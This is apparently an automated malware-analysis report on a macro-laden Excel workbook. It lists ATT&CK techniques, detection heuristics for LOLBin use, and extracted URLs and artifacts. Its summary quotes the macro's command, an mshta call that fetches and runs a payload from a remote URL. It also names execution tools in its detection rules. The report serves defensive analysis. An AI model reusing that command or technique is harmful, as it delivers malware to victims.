MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.005 Client Execution: Mshta
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are triggered upon closing the workbook. The Workbook_BeforeClose subroutine calls Shell to execute a function named 'hol.pop'. The 'hol' module contains a function 'lol' which returns the string 'mshta http://www.j.mp/jaosdoaskdaosd'. This indicates the macro attempts to download and execute a second-stage payload using mshta. The presence of LOLBin references and the execution of external URLs strongly suggest a malicious intent to download and run further malicious code.
Heuristics 5
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBA
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
VBA project inside OOXML medium OOXML_VBADocument contains a VBA project — VBA macros present
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.j.mp/asdjaosdkasdkddd
- http://www.j.mp/jaosdoaskdaosd
- http://www.j.mp/jasidjalsdjlijlijasd
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basc418081c7006785adbeb81ff8c08c45b74ad75c0868b1573d0f7046216a12329 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1714 bytes |
vbaProject_00.binb8683742a69dc0a7708a5b69048859c78fcd6c45b33ba2cc735675a6bff519f0 |
vba-project | OOXML VBA project: xl/vbaProject.bin | 21504 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.